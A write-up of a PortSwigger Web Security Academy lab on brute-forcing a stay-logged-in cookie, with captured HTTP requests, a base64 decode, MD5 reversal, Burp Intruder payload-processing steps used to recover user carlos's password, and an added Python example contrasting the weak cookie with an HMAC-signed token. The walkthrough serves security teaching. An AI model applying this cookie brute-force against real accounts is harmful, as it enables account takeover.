PortSwigger: Brute-forcing a stay-logged-in cookie
Brute-forcing a stay-logged-in cookie
Solution
Open the website: https://0a46003c04ff8a52805c26e500b600db.web-security-academy.net/login
---
GET /login HTTP/2
Host: 0a46003c04ff8a52805c26e500b600db.web-security-academy.net
Cookie: session=MAnXuL1nxUExvudoCpZwWSLZPy20jbcS
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a46003c04ff8a52805c26e500b600db.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Log in as user wiener:
L: wiener
P: peter
stay-logged-in=on (after reopening the website, wiener is still logged in)
---
POST /login HTTP/2
Host: 0a46003c04ff8a52805c26e500b600db.web-security-academy.net
Cookie: session=MAnXuL1nxUExvudoCpZwWSLZPy20jbcS
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: https://0a46003c04ff8a52805c26e500b600db.web-security-academy.net
Referer: https://0a46003c04ff8a52805c26e500b600db.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=wiener&password=peter&stay-logged-in=on
---
GET /my-account?id=wiener HTTP/2
Host: 0a46003c04ff8a52805c26e500b600db.web-security-academy.net
Cookie: session=C5SnWz908gYw2svl5zDAgzczIuEVfUXj; stay-logged-in=d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a46003c04ff8a52805c26e500b600db.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Cookie analysis
Base64 decode
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger]
└─$ echo "d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw" | base64 -d
wiener:51dc30ddc473d43a6011e9ebba6ca770
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger]
---
MD5 reverse
https://md5.gromweb.com/?md5=51dc30ddc473d43a6011e9ebba6ca770
51dc30ddc473d43a6011e9ebba6ca770 ==> peter
Brute-force the login for user: carlos
Cookie format: base64(username:md5(password))
Create the payload-processing rule:
hash: md5
add prefix: carlos:
encode: base64-encode
password list from here: https://portswigger.net/web-security/authentication/auth-lab-passwords
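Added example (not part of the original writeup): decode the lab's cookie to confirm the base64(username:md5(password)) construction above, and contrast it with a hardened remember-me token that carries a random nonce and an HMAC under a server-side key instead of anything derived from the password. SERVER_KEY, hardened_cookie, verify_hardened and tampered_cookie are hypothetical names chosen for this illustration.

```python
import base64
import hashlib
import hmac
import os

# Real cookie value captured in the writeup above.
LAB_COOKIE = "d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw"


def decode_stay_logged_in(cookie: str) -> tuple:
    """Split the lab's cookie, base64(username:md5(password)), into its parts."""
    user, digest = base64.b64decode(cookie).decode().split(":", 1)
    return user, digest


def weak_cookie(username: str, password: str) -> str:
    """Reproduce the lab's construction. The value is a pure function of the
    password (unsalted MD5), so it can be checked against a wordlist offline."""
    digest = hashlib.md5(password.encode()).hexdigest()
    return base64.b64encode(f"{username}:{digest}".encode()).decode()


# Hypothetical hardened design: the cookie carries a random nonce plus an HMAC
# under a server-side secret, and nothing derived from the password.
SERVER_KEY = os.urandom(32)  # constructed here; load from secret storage in practice


def hardened_cookie(username: str) -> str:
    nonce = os.urandom(16).hex()
    tag = hmac.new(SERVER_KEY, f"{username}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(f"{username}:{nonce}:{tag}".encode()).decode()


def verify_hardened(cookie: str):
    """Return the username if the tag is valid, else None. Changing the username
    or nonce invalidates the HMAC; without SERVER_KEY no valid tag can be produced."""
    try:
        user, nonce, tag = base64.urlsafe_b64decode(cookie).decode().rsplit(":", 2)
        expected = hmac.new(SERVER_KEY, f"{user}:{nonce}".encode(), hashlib.sha256).hexdigest()
        return user if hmac.compare_digest(expected, tag) else None
    except (ValueError, TypeError):  # bad base64, bad UTF-8, wrong field count
        return None


def tampered_cookie(cookie: str, new_user: str) -> str:
    """Swap the username in a hardened cookie but keep nonce and tag (for testing)."""
    _, nonce, tag = base64.urlsafe_b64decode(cookie).decode().rsplit(":", 2)
    return base64.urlsafe_b64encode(f"{new_user}:{nonce}:{tag}".encode()).decode()
```

The hardened token is stateless; a production remember-me flow would additionally store the nonce server-side so individual tokens can be revoked.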
---
Edit the request for user wiener (captured after a correct login)
---
Old request - user wiener
___
GET /my-account?id=wiener HTTP/2
Host: 0a81006f0394e314802b26be00c7002d.web-security-academy.net
Cookie: session=PmyAP5YIarALnpYBas6U0mXHGkmKkc9g; stay-logged-in=d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a81006f0394e314802b26be00c7002d.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
Edit the request for user carlos
Clear the session cookie value (leave it empty) so only stay-logged-in is used
Add the password wordlist as the payload
Add payload processing:
1) Hash: MD5
2) Add Prefix: carlos:
3) Base64-encode
___
GET /my-account?id=carlos HTTP/2
Host: 0a81006f0394e314802b26be00c7002d.web-security-academy.net
Cookie: session=; stay-logged-in=d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a81006f0394e314802b26be00c7002d.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
Found the correct password for user carlos
___
GET /my-account?id=carlos HTTP/2
Host: 0a81006f0394e314802b26be00c7002d.web-security-academy.net
Cookie: session=; stay-logged-in=Y2FybG9zOjFhMWRjOTFjOTA3MzI1YzY5MjcxZGRmMGM5NDRiYzcy
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a81006f0394e314802b26be00c7002d.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
Solved
L: carlos
P: pass